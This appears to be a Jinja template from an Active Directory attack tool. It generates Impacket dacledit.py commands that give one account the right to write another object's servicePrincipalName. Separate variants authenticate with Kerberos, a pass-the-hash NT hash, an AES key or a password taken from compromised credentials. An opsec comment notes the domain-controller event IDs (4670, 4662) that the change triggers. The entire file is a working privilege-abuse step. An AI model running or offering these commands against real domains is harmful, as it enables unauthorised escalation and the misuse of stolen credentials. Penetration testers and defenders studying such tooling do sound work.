# Give permission to write the property servicePrincipalName on {{target.name}} to {{parent.obj.name}}
# Modifying permissions on an object will generate 4670 and 4662 events on the
# domain controller that handled the request. Additional opsec considerations depend
# on the target object and how to take advantage of this privilege.
{% if parent.krb_auth %}
dacledit.py '{{fqdn}}/{{parent.obj.name}}' -k -no-pass -use-ldaps -dc-ip {{dc_ip}} -principal-dn '{{parent.obj.dn}}' -target '{{target.name}}' -rights-guid f3a64788-5306-11d1-a9c5-0000f80367c1 -mask write -action write
{%- elif parent.secret_type == T_SECRET_NTHASH %}
dacledit.py '{{fqdn}}/{{parent.obj.name}}' -hashes :{{parent.secret|red}} -use-ldaps -dc-ip {{dc_ip}} -principal-dn '{{parent.obj.dn}}' -target '{{target.name}}' -rights-guid f3a64788-5306-11d1-a9c5-0000f80367c1 -mask write -action write
{%- elif parent.secret_type == T_SECRET_AESKEY %}
dacledit.py '{{fqdn}}/{{parent.obj.name}}' -k -no-pass -aesKey {{parent.secret|red}} -use-ldaps -dc-ip {{dc_ip}} -principal-dn '{{parent.obj.dn}}' -target '{{target.name}}' -rights-guid f3a64788-5306-11d1-a9c5-0000f80367c1 -mask write -action write
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
dacledit.py '{{fqdn}}/{{parent.obj.name}}:{{parent.secret|red}}' -use-ldaps -dc-ip {{dc_ip}} -principal-dn '{{parent.obj.dn}}' -target '{{target.name}}' -rights-guid f3a64788-5306-11d1-a9c5-0000f80367c1 -mask write -action write
{%- endif %}
